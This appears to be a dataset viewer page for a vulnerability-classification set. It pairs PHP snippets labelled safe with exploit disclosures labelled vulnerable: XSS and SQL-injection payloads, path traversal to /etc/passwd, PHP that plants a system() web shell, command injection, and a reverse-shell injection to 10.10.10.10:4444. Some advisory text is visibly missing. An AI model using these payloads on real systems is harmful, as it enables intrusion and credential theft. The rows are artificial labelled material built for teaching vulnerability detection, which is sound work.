Dataset Viewer
instruction
stringclasses 1
value | input
stringlengths 299
10.1k
| output
stringclasses 2
values |
---|---|---|
please judge the source code for vulnerabilities. | public function proc<underscore>inquiry()<NEWLINE>{<NEWLINE> $param = $this<hyphen>>get<underscore>param();<NEWLINE> if (isset($param[parent::ACCOUNT<underscore>ID])) {<NEWLINE> $stmt = null;<NEWLINE> $db = $this<hyphen>>get<underscore>db();<NEWLINE> $session = $this<hyphen>>get<underscore>session();<NEWLINE> $id = $session[$this<hyphen>>get<underscore>login()][parent::USER<underscore>ID];<NEWLINE> $account<underscore>id = $param[parent::ACCOUNT<underscore>ID];<NEWLINE> try {<NEWLINE> <slash><slash> 疑問符パラメータを用いてSQLステートメントを準備する<NEWLINE> $stmt = $db<hyphen>>prepare(<double<underscore>quote>SELECT * FROM account WHERE id = ? AND<NEWLINE> account<underscore>id = ?<double<underscore>quote>);<NEWLINE> if ($stmt == null) {<NEWLINE> throw new Exception();<NEWLINE> }<NEWLINE> <slash><slash> 値の配列を渡してプリペアドステートメントを実行する<NEWLINE> $result1 = $stmt<hyphen>>execute(array($id, $account<underscore>id));<NEWLINE><slash><slash> 以降は省略 | 0 |
please judge the source code for vulnerabilities. | public function proc<underscore>record()<NEWLINE>{<NEWLINE> $param = $this<hyphen>>get<underscore>param();<NEWLINE> $account<underscore>history = array();<NEWLINE> if (isset($param[parent::ACCOUNT<underscore>ID])) {<NEWLINE> $money<underscore>columns = array(parent::BALANCE, parent::MONEY<underscore>OUT, parent::MONEY<underscore>IN);<NEWLINE> $stmt = null;<NEWLINE> $db = $this<hyphen>>get<underscore>db();<NEWLINE> $session = $this<hyphen>>get<underscore>session();<NEWLINE> $id = $session[$this<hyphen>>get<underscore>login()][parent::USER<underscore>ID];<NEWLINE> $account<underscore>id = $param[parent::ACCOUNT<underscore>ID];<NEWLINE> <slash><slash> 疑問符パラメータを用いてSQL文のWHERE句を記述する<NEWLINE> $sql = <double<underscore>quote> SELECT<NEWLINE> account<underscore>history.trade<underscore>date,<NEWLINE> account<underscore>history.trade<underscore>type,<NEWLINE> account<underscore>history.note,<NEWLINE> account<underscore>history.money<underscore>in,<NEWLINE> account<underscore>history.money<underscore>out,<NEWLINE> account<underscore>history.balance<NEWLINE> FROM<NEWLINE> account,<NEWLINE> account<underscore>history<NEWLINE> WHERE<NEWLINE> account.id = ?<NEWLINE> AND account.account<underscore>id = account<underscore>history.account<underscore>id<NEWLINE> AND account<underscore>history.account<underscore>id = ?<double<underscore>quote>;<NEWLINE> try {<NEWLINE> $stmt = $db<hyphen>>prepare($sql);<NEWLINE> if ($stmt == null) {<NEWLINE> throw new Exception();<NEWLINE> }<NEWLINE> <slash><slash> 値の配列を渡してプリペアドステートメントを実行する<NEWLINE> $result1 = $stmt<hyphen>>execute(array($id, $account<underscore>id));<NEWLINE><slash><slash> 以降は省略 | 0 |
please judge the source code for vulnerabilities. | public function proc<underscore>transfer()<NEWLINE>{<NEWLINE><slash><slash> 省略<NEWLINE> try {<NEWLINE> <slash><slash> 疑問符パラメータを用いてSQLステートメントを準備する<NEWLINE> $from<underscore>stmt = $db<hyphen>>prepare(<double<underscore>quote>UPDATE account SET balance = balance <hyphen> ?<NEWLINE> WHERE account<underscore>id = ? AND id = ?<double<underscore>quote>);<NEWLINE> <slash><slash> 値の配列を渡してプリペアドステートメントを実行する<NEWLINE> $from<underscore>stmt<hyphen>>execute(array($amount, $from<underscore>account<underscore>id, $id));<NEWLINE> } catch (Exception $e) {<NEWLINE> throw new Exception((<underscore><underscore>LINE<underscore><underscore> . <double<underscore>quote>:<double<underscore>quote> . json<underscore>encode($db<hyphen>>errorInfo())),<NEWLINE> LogUtil::ERROR<underscore>DB<underscore>EXECUTE);<NEWLINE> }<NEWLINE><slash><slash> 省略<NEWLINE> $row = 0;<NEWLINE> try {<NEWLINE> <slash><slash> 疑問符パラメータを用いてSQLステートメントを準備する<NEWLINE> $to<underscore>stmt = $db<hyphen>>prepare(<double<underscore>quote>UPDATE account SET balance = balance + ?<NEWLINE> WHERE account<underscore>id = ?<double<underscore>quote>);<NEWLINE> <slash><slash> 値の配列を渡してプリペアドステートメントを実行する<NEWLINE> $to<underscore>stmt<hyphen>>execute(array($amount, $to<underscore>account<underscore>id));<NEWLINE> $row = $to<underscore>stmt<hyphen>>rowCount();<NEWLINE> } catch (Exception $e) {<NEWLINE> throw new Exception((<underscore><underscore>LINE<underscore><underscore> . <double<underscore>quote>:<double<underscore>quote> . json<underscore>encode($db<hyphen>>errorInfo())),<NEWLINE> LogUtil::ERROR<underscore>DB<underscore>EXECUTE);<NEWLINE> }<NEWLINE><slash><slash> 省略 | 0 |
please judge the source code for vulnerabilities. | public function is<underscore>registed<underscore>id()<NEWLINE>{<NEWLINE> $db = $this<hyphen>>get<underscore>db();<NEWLINE> $param = $this<hyphen>>get<underscore>param();<NEWLINE> try {<NEWLINE> <slash><slash> 疑問符パラメータを用いてSQLステートメントを準備する<NEWLINE> $stmt = $db<hyphen>>prepare(<double<underscore>quote>SELECT * FROM user WHERE id = ?<double<underscore>quote>);<NEWLINE> if ($stmt == null) {<NEWLINE> throw new Exception();<NEWLINE> }<NEWLINE> <slash><slash> 値の配列を渡してプリペアドステートメントを実行する<NEWLINE> $stmt<hyphen>>execute(array($param[<double<underscore>quote>id<double<underscore>quote>]));<NEWLINE><slash><slash> 以降は省略 | 0 |
please judge the source code for vulnerabilities. | <form action=<double<underscore>quote>test.php<double<underscore>quote> method=<double<underscore>quote>POST<double<underscore>quote>><NEWLINE> 新パスワード<input name=<double<underscore>quote>pwd<double<underscore>quote> type=<double<underscore>quote>password<double<underscore>quote>><NEWLINE> <input type=<double<underscore>quote>hidden<double<underscore>quote> name=<double<underscore>quote>token<double<underscore>quote> value=<double<underscore>quote><?php echo session<underscore>id()?><double<underscore>quote>><NEWLINE> <input type=<double<underscore>quote>submit<double<underscore>quote> value=<double<underscore>quote>パスワード変更<double<underscore>quote>><NEWLINE><<slash>form> | 0 |
please judge the source code for vulnerabilities. | <?php<NEWLINE> session<underscore>start();<NEWLINE> if(session<underscore>id() === $<underscore>POST[<double<underscore>quote>token<double<underscore>quote>]{<NEWLINE> $id=$<underscore>SESSION[<double<underscore>quote>id<double<underscore>quote>];<NEWLINE> $pwd=$<underscore>POST[<double<underscore>quote>pwd<double<underscore>quote>];<NEWLINE> <slash><slash>以下パスワード変更処理<NEWLINE> }<NEWLINE>?> | 0 |
please judge the source code for vulnerabilities. | <?php<NEWLINE> public function validate<underscore>is<underscore>logined()<NEWLINE> {<NEWLINE> $session = $this<hyphen>>get<underscore>session();<NEWLINE> $param = $this<hyphen>>get<underscore>param();<NEWLINE> if (($this<hyphen>>get<underscore>page() == parent::PAGE<underscore>SETTING)<NEWLINE> && isset($session[$this<hyphen>>get<underscore>login()][<double<underscore>quote>secret<double<underscore>quote>])<NEWLINE> && ($session[$this<hyphen>>get<underscore>login()][<double<underscore>quote>secret<double<underscore>quote>] !== $param[<double<underscore>quote>secret<underscore>token<double<underscore>quote>])<NEWLINE> ) {<NEWLINE> $this<hyphen>>set<underscore>session($this<hyphen>>get<underscore>login(), false);<NEWLINE> $this<hyphen>>set<underscore>page(parent::PAGE<underscore>LOGIN);<NEWLINE> $this<hyphen>>set<underscore>content(self::WARNING9, true);<NEWLINE> return false;<NEWLINE> } else {<NEWLINE> <slash><slash> ログイン処理を行います<NEWLINE> parent::validate<underscore>is<underscore>logined();<NEWLINE> }<NEWLINE> }<NEWLINE>?> | 0 |
please judge the source code for vulnerabilities. | <?php<NEWLINE> public function prepare<underscore>set<underscore>token() {<NEWLINE> <slash><slash> 中略<NEWLINE> $session[$this<hyphen>>get<underscore>login()][self::TOKEN] = session<underscore>id();<NEWLINE> $this<hyphen>>set<underscore>session($this<hyphen>>get<underscore>login(), $session[$this<hyphen>>get<underscore>login()]);<NEWLINE> return $this;<NEWLINE> }<NEWLINE>?> | 0 |
please judge the source code for vulnerabilities. | <?php<NEWLINE>define(<single<underscore>quote>TMPLDIR<single<underscore>quote>, <single<underscore>quote><slash>var<slash>www<slash>dt<slash>tmpl<slash><single<underscore>quote>);<NEWLINE>if(isset($<underscore>GET[<single<underscore>quote>template<single<underscore>quote>])){<NEWLINE> <slash><slash> 修正したコード<NEWLINE> $file<underscore>name = basename($<underscore>GET[<single<underscore>quote>template<single<underscore>quote>]);<NEWLINE> readfile(TMPLDIR . $file<underscore>name);<NEWLINE>}<NEWLINE>?> | 0 |
please judge the source code for vulnerabilities. | POST <slash>rc<slash>?<underscore>task=settings&<underscore>action=plugin.filters<hyphen>save HTTP<slash>1.1<NEWLINE>Host: Target<NEWLINE>User<hyphen>Agent: Mozilla<slash>5.0<NEWLINE>Accept<hyphen>Language: en<hyphen>US,en;q=0.5<NEWLINE>Accept<hyphen>Encoding: gzip, deflate<NEWLINE>Content<hyphen>Type: application<slash>x<hyphen>www<hyphen>form<hyphen>urlencoded<NEWLINE>Content<hyphen>Length: 119<NEWLINE>Referer: https:<slash><slash>Target<slash>rc<slash>?<underscore>action=plugin.filters&<underscore>task=settings<NEWLINE>Cookie: roundcube<underscore>sessid=; roundcube<underscore>sessauth=<NEWLINE>Connection: close<NEWLINE>Upgrade<hyphen>Insecure<hyphen>Requests: 1<NEWLINE><underscore>token=09bcde247d252364ea55c217c7654a1f&<underscore>whatfilter=from]<script>alert(<single<underscore>quote>XSS<hyphen>1<single<underscore>quote>)<<slash>script>&<underscore>searchstring=whatever&<underscore>casesensitive=1&<underscore>folders=INBOX&<underscore>messages=all])<script>alert(<single<underscore>quote>XSS<hyphen>2<single<underscore>quote>)<<slash>script> | 1 |
please judge the source code for vulnerabilities. | Software: Symantec Web Gateway<NEWLINE>Current Software Version: 5.0.2.8<NEWLINE>Product homepage: www.symantec.com<NEWLINE>Author: S2 Crew [Hungary]<NEWLINE>CVE: CVE<hyphen>2012<hyphen>0297, CVE<hyphen>2012<hyphen>0298, ???<NEWLINE>File include:<NEWLINE>https:<slash><slash>192.168.82.207<slash>spywall<slash>previewProxyError.php?err=..<slash>..<slash>..<slash>..<slash>..<slash>..<slash>..<slash>..<slash>etc<slash>passwd<NEWLINE>File include and OS command execution:<NEWLINE>http:<slash><slash>192.168.82.207<slash>spywall<slash>releasenotes.php?relfile=..<slash>..<slash>..<slash>..<slash>..<slash>..<slash>etc<slash>passwd<NEWLINE>You can execute OS commands just include the error<underscore>log:<NEWLINE><slash>usr<slash>local<slash>apache2<slash>logs<slash><NEWLINE><hyphen>rw<hyphen>r<hyphen><hyphen>r<hyphen><hyphen> 1 root root 5925 Nov 15 07:25 access<underscore>log<NEWLINE><hyphen>rw<hyphen>r<hyphen><hyphen>r<hyphen><hyphen> 1 root root 3460 Nov 15 07:21 error<underscore>log<NEWLINE>Make a connection to port 80:<NEWLINE><?php<NEWLINE>$f = fopen(<single<underscore>quote><slash>var<slash>www<slash>html<slash>spywall<slash>cleaner<slash>cmd.php<single<underscore>quote>,<single<underscore>quote>w<single<underscore>quote>);<NEWLINE>$cmd = <double<underscore>quote><?php system(<backslash>$<underscore>GET[<single<underscore>quote>cmd<single<underscore>quote>]); ?><double<underscore>quote>;<NEWLINE>fputs($f,$cmd);<NEWLINE>fclose($f);<NEWLINE>print <double<underscore>quote>Shell creation done<br><double<underscore>quote>;<NEWLINE>?><NEWLINE>Arbitary file download and delete:<NEWLINE>https:<slash><slash>192.168.82.207<slash>spywall<slash>download<underscore>file.php?d=<slash>tmp<slash>addroutelog&name=addroutelog<NEWLINE>d parameter: the complete filename<NEWLINE>After the download process application removes the original file with root access! :)<NEWLINE>Command execution methods:<NEWLINE>1.Method<NEWLINE>Download and delete the <slash>var<slash>www<slash>html<slash>ciu<slash>.htaccess file.<NEWLINE>After it you can access the ciu interface on web.<NEWLINE>There is an upload script: <slash>ciu<slash>uploadFile.php<NEWLINE>User can control the filename and the upload location:<NEWLINE>$<underscore>FILES[<single<underscore>quote>uploadFile<single<underscore>quote>];<NEWLINE>$<underscore>POST[<single<underscore>quote>uploadLocation<single<underscore>quote>];<NEWLINE>2.Method<NEWLINE><form action=<double<underscore>quote>https:<slash><slash>192.168.82.192<slash>ciu<slash>remoteRepairs.php<double<underscore>quote> method=<double<underscore>quote>POST<double<underscore>quote> enctype=<double<underscore>quote>multipart<slash>form<hyphen>data<double<underscore>quote>><NEWLINE><input type=<double<underscore>quote>file<double<underscore>quote> name=<double<underscore>quote>uploadFile<double<underscore>quote>><NEWLINE><input type=<double<underscore>quote>text<double<underscore>quote> name=<double<underscore>quote>action<double<underscore>quote> value=<double<underscore>quote>upload<double<underscore>quote>><NEWLINE><input type=<double<underscore>quote>text<double<underscore>quote> name=<double<underscore>quote>uploadLocation<double<underscore>quote> value=<double<underscore>quote><slash>var<slash>www<slash>html<slash>spywall<slash>cleaner<slash><double<underscore>quote>><NEWLINE><input type=<double<underscore>quote>hidden<double<underscore>quote> name=<double<underscore>quote>configuration<double<underscore>quote> value=<double<underscore>quote>test<double<underscore>quote>><NEWLINE><input type=<double<underscore>quote>submit<double<underscore>quote> value=<double<underscore>quote>upload!<double<underscore>quote>><NEWLINE><<slash>form><NEWLINE>The <double<underscore>quote><slash>var<slash>www<slash>html<slash>spywall<slash>cleaner<double<underscore>quote> is writeable by www<hyphen>data.<NEWLINE>Command execution after authentication:<NEWLINE>http:<slash><slash>192.168.82.207<slash>spywall<slash>adminConfig.php (this is deprecated config file, it should be remove)<NEWLINE>From the modified POST message:<NEWLINE>Content<hyphen>Disposition: form<hyphen>data; name=<double<underscore>quote>pingaddress<double<underscore>quote><NEWLINE>127.0.0.1`whoami><slash>tmp<slash>1234.txt` | 1 |
please judge the source code for vulnerabilities. | Details<NEWLINE>=======<NEWLINE>Product: Alienvault OSSIM<slash>USM<NEWLINE>Vulnerability: Multiple Vulnerabilities (XSS, SQLi, Command Execution)<NEWLINE>Author: Peter Lapp, lappsec@gmail.com<NEWLINE>CVE: None assigned<NEWLINE>Vulnerable Versions: Tested on 4.14, 4.15, and 5.0. It likely affects<NEWLINE>all previous versions as well.<NEWLINE>Fixed Version: No fix has been released.<NEWLINE>Summary<NEWLINE>=======<NEWLINE>Alienvault OSSIM is an open source SIEM solution designed to collect<NEWLINE>and correlate log data. The vulnerability management section of the UI<NEWLINE>allows a user to upload a Nessus scan in NBE format. Using a specially<NEWLINE>crafted NBE file, a user can exploit multiple vulnerabilities such as<NEWLINE>XSS, SQLi, and Command Execution. Authentication is required to<NEWLINE>exploit this vulnerability, but admin privileges are not required. Any<NEWLINE>user with access to the Vulnerabilities page can perform these<NEWLINE>attacks.<NEWLINE>The vendor was notified almost 5 months ago about this vulnerability.<NEWLINE>Given that they have not responded to my recent requests for updates<NEWLINE>and just released a major version that did not patch these issues, I<NEWLINE>have decided to release the details.<NEWLINE>Technical Details<NEWLINE>=================<NEWLINE>Various fields within the NBE file can be manipulated to exploit<NEWLINE>certain vulnerabilities. A pretty bare template that I used to test<NEWLINE>these issues looked something like this:<NEWLINE>timestamps|||scan<underscore>start|Thu Dec 11 17:00:51 2014|<NEWLINE>timestamps||1.1.1.1|host<underscore>start|Thu Dec 11 17:00:52 2014|<NEWLINE>results|1.1.1.1|1.1.1.1|cifs (445<slash>tcp)|1234|Security Hole|Synopsis<NEWLINE>:<backslash>n<backslash>nThe remote host contains a web browser that is affected by<NEWLINE>multiple vulnerabilities.<backslash>nOther references :<NEWLINE>OSVDB:113197,OSVDB:113198,OSVDB:113199,OSVDB:115035<backslash>n<NEWLINE>timestamps||1.1.1.1|host<underscore>end|Thu Dec 11 17:11:58 2014|<NEWLINE>timestamps|||scan<underscore>end|Thu Dec 11 17:16:44 2014|<NEWLINE>Reflective XSS<NEWLINE><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><NEWLINE>The hostname<slash>IP portion of the NBE import is vulnerable. Putting<NEWLINE><script>alert(0)<<slash>script> directly after the hostname<slash>IP in the NBE<NEWLINE>will result in the javascript being reflected back when the import<NEWLINE>finishes.<NEWLINE>Stored XSS<NEWLINE><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><NEWLINE>The plugin ID portion of the NBE is vulnerable.<NEWLINE>Adding<script>alert(document.cookie)<<slash>script> to the plugin ID in the<NEWLINE>NBE will result in the script being executed every time someone views<NEWLINE>the HTML report in the OSSIM interface.<NEWLINE>Blind SQL Injection<NEWLINE><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><NEWLINE>The plugin ID is also vulnerable to blind SQLi. Adding <single<underscore>quote> UNION SELECT<NEWLINE>SLEEP(20) AND <single<underscore>quote>1<single<underscore>quote>=<single<underscore>quote>1 to the plugin ID will cause the DB to sleep for<NEWLINE>20 seconds.<NEWLINE>SQL Injection<NEWLINE><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><NEWLINE>The protocol portion of the NBE is vulnerable to SQL injection.<NEWLINE>Take this:<NEWLINE>cifs (445<slash>tcp)<NEWLINE>And turn it to this:<NEWLINE>cifs<single<underscore>quote>,<single<underscore>quote>0<single<underscore>quote>,<single<underscore>quote>1(<single<underscore>quote>,(select<slash>**<slash>pass<slash>**<slash>from<slash>**<slash>users<slash>**<slash>where<slash>**<slash>login=<double<underscore>quote>admin<double<underscore>quote>),<single<underscore>quote>N<single<underscore>quote>);<NEWLINE>(445<slash>tcp)<NEWLINE>That will result in the hash of the admin password being included in<NEWLINE>the report. The extra <single<underscore>quote>(<single<underscore>quote> in <single<underscore>quote>1(<single<underscore>quote> is required for the ending ) in<NEWLINE>order to not cause an error in the Perl script that runs the import.<NEWLINE>Command Injection<NEWLINE><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><hyphen><NEWLINE>The hostname<slash>IP portion of the NBE is vulnerable. Adding <single<underscore>quote><NEWLINE><slash>bin<slash>sh 10.10.10.10 4444&&<single<underscore>quote> will result in a reverse shell as www<hyphen>data<NEWLINE>to 10.10.10.10.<NEWLINE>The initial<NEWLINE>that comes before the dig command where this is injected. Without it<NEWLINE>the script won<single<underscore>quote>t proceed to the required point.<NEWLINE>Solution<NEWLINE>========<NEWLINE>There<single<underscore>quote>s no official patch for this yet. It is possible to restrict<NEWLINE>access to the Vulnerabilities page via user roles, which should<NEWLINE>prevent a user from exploiting this. Also, if you<single<underscore>quote>re not using the<NEWLINE>import feature, you could rename the Perl script on the file system<NEWLINE>that runs the import.<NEWLINE>Timeline<NEWLINE>========<NEWLINE>01<slash>12<slash>2015 <hyphen> Notified the vendor of the vulnerabilities.<NEWLINE>01<slash>12<slash>2015 <hyphen> Vendor confirms the issue and files a defect.<NEWLINE>01<slash>28<slash>2015 <hyphen> Requested an update from the vendor and was told the<NEWLINE>issue would be worked on in the future.<NEWLINE>04<slash>20<slash>2015 <hyphen> Requested an update and informed the vendor of my intent<NEWLINE>to release the details. No response.<NEWLINE>05<slash>05<slash>2015 <hyphen> Released details to FD. | 1 |
please judge the source code for vulnerabilities. | <hyphen><hyphen><hyphen><hyphen><hyphen> PoC 1: SQLi <hyphen><hyphen><hyphen><hyphen><hyphen><NEWLINE>Request:<NEWLINE>http:<slash><slash>localhost<slash>[PATH]<slash>emlak<hyphen>ara.html?emlak<underscore>durumu=0&emlak<underscore>tipi=0&il=0&ilce=0&kelime=0&max<underscore>fiyat=e&max<underscore>metrekare=e&min<underscore>fiyat=e&min<underscore>metrekare=e&resim=evet&semt=0&video=evet<NEWLINE>Vulnerable Parameter: emlak<underscore>durumu (GET)<NEWLINE>Payload: <hyphen>1<single<underscore>quote> OR 3*2*1=6 AND 000744=000744 <hyphen><hyphen><NEWLINE><hyphen><hyphen><hyphen><hyphen><hyphen> PoC 2: SQLi <hyphen><hyphen><hyphen><hyphen><hyphen><NEWLINE>Request:<NEWLINE>http:<slash><slash>localhost<slash>[PATH]<slash>emlak<hyphen>ara.html?emlak<underscore>durumu=0&emlak<underscore>tipi=0&il=0&ilce=0&kelime=0&max<underscore>fiyat=e&max<underscore>metrekare=e&min<underscore>fiyat=e&min<underscore>metrekare=e&resim=evet&semt=0&video=evet<NEWLINE>Vulnerable Parameter: emlak<underscore>tipi (GET)<NEWLINE>Payload: 0<single<underscore>quote>XOR(if(now()=sysdate(),sleep(0),0))XOR<single<underscore>quote>Z<NEWLINE><hyphen><hyphen><hyphen><hyphen><hyphen> PoC 3: SQLi <hyphen><hyphen><hyphen><hyphen><hyphen><NEWLINE>Request:<NEWLINE>http:<slash><slash>localhost<slash>[PATH]<slash>emlak<hyphen>ara.html?emlak<underscore>durumu=0&emlak<underscore>tipi=0&il=0&ilce=0&kelime=0&max<underscore>fiyat=e&max<underscore>metrekare=e&min<underscore>fiyat=e&min<underscore>metrekare=e&resim=evet&semt=0&video=evet<NEWLINE>Vulnerable Parameter: il (GET)<NEWLINE>Payload: 0<single<underscore>quote>XOR(if(now()=sysdate(),sleep(0),0))XOR<single<underscore>quote>Z<NEWLINE><hyphen><hyphen><hyphen><hyphen><hyphen> PoC 4: SQLi <hyphen><hyphen><hyphen><hyphen><hyphen><NEWLINE>Request:<NEWLINE>http:<slash><slash>localhost<slash>[PATH]<slash>emlak<hyphen>ara.html?emlak<underscore>durumu=0&emlak<underscore>tipi=0&il=0&ilce=0&kelime=0&max<underscore>fiyat=e&max<underscore>metrekare=e&min<underscore>fiyat=e&min<underscore>metrekare=e&resim=evet&semt=0&video=evet<NEWLINE>Vulnerable Parameter: ilce (GET)<NEWLINE>Payload: <hyphen>1<single<underscore>quote> OR 3*2*1=6 AND 000397=000397 <hyphen><hyphen><NEWLINE><hyphen><hyphen><hyphen><hyphen><hyphen> PoC 5: SQLi <hyphen><hyphen><hyphen><hyphen><hyphen><NEWLINE>Request:<NEWLINE>http:<slash><slash>localhost<slash>[PATH]<slash>emlak<hyphen>ara.html?emlak<underscore>durumu=0&emlak<underscore>tipi=0&il=0&ilce=0&kelime=0&max<underscore>fiyat=e&max<underscore>metrekare=e&min<underscore>fiyat=e&min<underscore>metrekare=e&resim=evet&semt=0&video=evet<NEWLINE>Vulnerable Parameter: kelime (GET)<NEWLINE>Payload: <hyphen>1<single<underscore>quote> OR 3*2*1=6 AND 000397=000397 <hyphen><hyphen><NEWLINE><hyphen><hyphen><hyphen><hyphen><hyphen> PoC 6: SQLi <hyphen><hyphen><hyphen><hyphen><hyphen><NEWLINE>Request:<NEWLINE>http:<slash><slash>localhost<slash>[PATH]<slash>emlak<hyphen>ara.html?emlak<underscore>durumu=0&emlak<underscore>tipi=0&il=0&ilce=0&kelime=0&max<underscore>fiyat=e&max<underscore>metrekare=e&min<underscore>fiyat=e&min<underscore>metrekare=e&resim=evet&semt=0&video=evet<NEWLINE>Vulnerable Parameter: semt (GET)<NEWLINE>Payload: <hyphen>1<single<underscore>quote> OR 3*2*1=6 AND 000531=000531 <hyphen><hyphen> | 1 |
please judge the source code for vulnerabilities. | =<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==T==K==R==D==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>=<NEWLINE>MySimpleFileUploader V1.6 Upload Shell Vulnerability<NEWLINE>script: MySimpleFileUploader V1.6<NEWLINE>Site script: http:<slash><slash>phpx3.com<NEWLINE>=<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==T==K==R==D==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>=<NEWLINE>Found by: FormatXFormaT<NEWLINE>contact: hun4r@yahoo.com<NEWLINE>Forum: http:<slash><slash>Tkurd.com<NEWLINE>=<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==T==K==R==D==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>=<NEWLINE>Dork:<NEWLINE><double<underscore>quote>Powerd By MySimpleFileUploader V1.6<double<underscore>quote><NEWLINE>=<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==T==K==R==D==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>=<NEWLINE>Exploit:<NEWLINE>step 1 : Change type file to c99.php.sisx<NEWLINE>step 2 : Upload Your Shell<NEWLINE>=<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==T==K==R==D==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>=<NEWLINE>Video:<NEWLINE>http:<slash><slash>www.megaupload.com<slash>?d=Z0R343KN<NEWLINE>=<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==T==K==R==D==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>=<NEWLINE>Special Thanks: Angry<hyphen>Boy , Neo , All Tkurd Memebers.<NEWLINE>=<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==T==K==R==D==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>==<hyphen>= | 1 |
please judge the source code for vulnerabilities. | <hyphen><hyphen><hyphen><hyphen><hyphen> PoC 1: SQLi <hyphen><hyphen><hyphen><hyphen><hyphen><NEWLINE>Request: http:<slash><slash>localhost<slash>[PATH]<slash>arama?kategori=&q=<NEWLINE>Vulnerable Parameter: q (GET)<NEWLINE>Payload: 0<single<underscore>quote>XOR(if(now()=sysdate(),sleep(0),0))XOR<single<underscore>quote>Z<NEWLINE><hyphen><hyphen><hyphen><hyphen><hyphen> PoC 2: SQLi <hyphen><hyphen><hyphen><hyphen><hyphen><NEWLINE>Request: http:<slash><slash>localhost<slash>[PATH]<slash>ajax<slash>productsFilterSearch<NEWLINE>Vulnerable Parameter: q (POST)<NEWLINE>Payload:<NEWLINE>kategori=&pageType=arama&q=0<single<underscore>quote>XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR<single<underscore>quote>Z&sayfa=1 | 1 |
please judge the source code for vulnerabilities. | Product: OX Guard<NEWLINE>Vendor: OX Software GmbH<NEWLINE>Internal reference: 47878 (Bug ID)<NEWLINE>Vulnerability type: Cross Site Scripting (CWE<hyphen>80)<NEWLINE>Vulnerable version: 2.4.2 and earlier<NEWLINE>Vulnerable component: guard<NEWLINE>Report confidence: Confirmed<NEWLINE>Solution status: Fixed by Vendor<NEWLINE>Fixed version: 2.4.0<hyphen>rev11, 2.4.2<hyphen>rev5<NEWLINE>Researcher credits: Benjamin Daniel Mussler (@dejavuln)<NEWLINE>Vendor notification: 2016<hyphen>08<hyphen>03<NEWLINE>Solution date: 2016<hyphen>08<hyphen>18<NEWLINE>Public disclosure: 2016<hyphen>09<hyphen>13<NEWLINE>CVE reference: CVE<hyphen>2016<hyphen>6854<NEWLINE>CVSS: 6.5 (CVSS:3.0<slash>AV:N<slash>AC:L<slash>PR:N<slash>UI:R<slash>S:U<slash>C:L<slash>I:N<slash>A:N)<NEWLINE>Vulnerability Details:<NEWLINE>Script code which got injected to a mail with inline PGP signature gets executed when verifying the signature.<NEWLINE>Risk:<NEWLINE>Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).<NEWLINE>Steps to reproduce:<NEWLINE>1. Add JS code to a mail body<NEWLINE>2. Use PGP inline signatures<NEWLINE>3. Open the mail in OX App Suite<NEWLINE>Solution:<NEWLINE>Users should not open mail from untrusted sources. We made sure that the verified content does not get handled in a way that code can get executed. Operators should update to the latest Patch Release.<NEWLINE>Internal reference: 47914 (Bug ID)<NEWLINE>Vulnerability type: Cross Site Scripting (CWE<hyphen>80)<NEWLINE>Vulnerable version: 2.4.2 and earlier<NEWLINE>Vulnerable component: guard<NEWLINE>Report confidence: Confirmed<NEWLINE>Solution status: Fixed by Vendor<NEWLINE>Fixed version: 2.4.0<hyphen>rev11, 2.4.2<hyphen>rev5<NEWLINE>Researcher credits: secator<NEWLINE>Vendor notification: 2016<hyphen>08<hyphen>05<NEWLINE>Solution date: 2016<hyphen>08<hyphen>18<NEWLINE>Public disclosure: 2016<hyphen>09<hyphen>13<NEWLINE>CVE reference: CVE<hyphen>2016<hyphen>6853<NEWLINE>CVSS: 4.3 (CVSS:3.0<slash>AV:N<slash>AC:L<slash>PR:N<slash>UI:R<slash>S:U<slash>C:L<slash>I:N<slash>A:N)<NEWLINE>Vulnerability Details:<NEWLINE>Script code and references to external websites can be injected to the names of PGP public keys. When requesting that key later on using a specific URL, such script code might get executed. In case of injecting external websites, users might get lured into a phishing scheme.<NEWLINE>Risk:<NEWLINE>Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).<NEWLINE>Steps to reproduce:<NEWLINE>1. As attacker, create a PGP key with malicious name<NEWLINE>2. Get the key ID 